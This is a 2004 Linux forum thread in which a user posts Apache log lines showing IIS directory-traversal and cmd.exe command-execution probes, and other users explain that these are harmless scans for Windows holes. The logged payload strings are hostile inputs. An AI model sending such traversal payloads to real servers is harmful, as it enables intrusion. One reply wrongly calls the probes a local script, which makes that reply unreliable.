LinuxQuestions.org
Welcome to the most active Linux Forum on the web.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Newbie
User Name
Password
Linux - Newbie This Linux forum is for members that are new to Linux.
Just starting out and have a question? If it is not in the man pages or the how-to's this is the place!

Notices


Reply
  Search this Thread
Old 01-26-2004, 02:11 PM   #1
Zaius
Member
 
Registered: Jan 2004
Location: Canada
Posts: 68

Rep: Reputation: 15
should i be concerned


this is a log from my apache logs.

24.0.77.100 - - [26/Jan/2004:02:19:47 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 299
24.0.77.100 - - [26/Jan/2004:02:19:50 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 297
24.0.77.100 - - [26/Jan/2004:02:19:53 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
24.0.77.100 - - [26/Jan/2004:02:19:56 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
24.0.77.100 - - [26/Jan/2004:02:20:00 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
24.0.77.100 - - [26/Jan/2004:02:20:03 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
24.0.77.100 - - [26/Jan/2004:02:20:06 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
24.0.77.100 - - [26/Jan/2004:02:20:09 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 354 24.0.77.100 - - [26/Jan/2004:02:20:12 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
24.0.77.100 - - [26/Jan/2004:02:20:25 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 311
24.0.77.100 - - [26/Jan/2004:02:20:35 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 311
24.0.77.100 - - [26/Jan/2004:02:20:38 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
24.0.77.100 - - [26/Jan/2004:02:20:41 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321

should i be concerned that someone is 'trying' to find what could be important files, if this were a windows machine.

what constituts as something i should take action towards? this guys not too bright obviously.. but still.. does snooping around like this happen often?

other question.. can i block my own ip from being logged? as 80% or more of the log is either my cable IP, eth0 IP or loopback's IP.. so it would be nice if i just saw what other people were doing.
 
Old 01-26-2004, 02:25 PM   #2
chrisk5527
Member
 
Registered: Oct 2002
Location: Michigan
Distribution: Slackware Linux 10.0
Posts: 289

Rep: Reputation: 30
It doesnt look like someone is snooping around your system. The reason why I say this is because it looks like there is access to a scripts directory through your web server setup. A script might be executing cmd.exe to run correctly. I'm not sure what software your using as your web server, but to my knowledge, I dont believe you can omit your own IP address from a log.
 
Old 01-26-2004, 02:35 PM   #3
Khabi
Member
 
Registered: Aug 2003
Location: Arizona
Distribution: Gentoo
Posts: 142

Rep: Reputation: 15
No, you really don't need to be worried about it. They're scanning for IIS exploits, they really don't apply to you
I run a webserver and get that alot, its mostly just script-kiddies looking around for an *easy hack*. Maybe jot down the ip that the scan came from and keep an eye out for other scans from the same general IP address. If it gets to be a problem bring it up w/ the ISP.
If you start seeing apache specific exploits then you should start being a little more worried. Just keep an eye on your secure and message log files for unusal stuff.

All in all your fine tho. You'll probably see alot more of those.
 
Old 01-26-2004, 02:40 PM   #4
Zaius
Member
 
Registered: Jan 2004
Location: Canada
Posts: 68

Original Poster
Rep: Reputation: 15
ok thanks..

although i don't have a scripts folder within my webpage directory.. so that's why i was wondering why they're be trying to look for something in there..

i am using apache2 on fedora linux.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
New and concerned- FW question aquaboot Linux - Security 3 08-17-2005 05:46 PM
should i be concerned (defragment?)... marsques Slackware 6 01-13-2005 12:10 AM
Should I be concerned? LinuxBAH Linux - Security 8 02-07-2004 12:24 PM
newbie a bit concerned amby Mandriva 4 01-13-2004 02:42 PM
Concerned about delete partition ajmacedo Linux - Newbie 3 10-28-2003 03:44 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Newbie

All times are GMT -5. The time now is 12:31 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration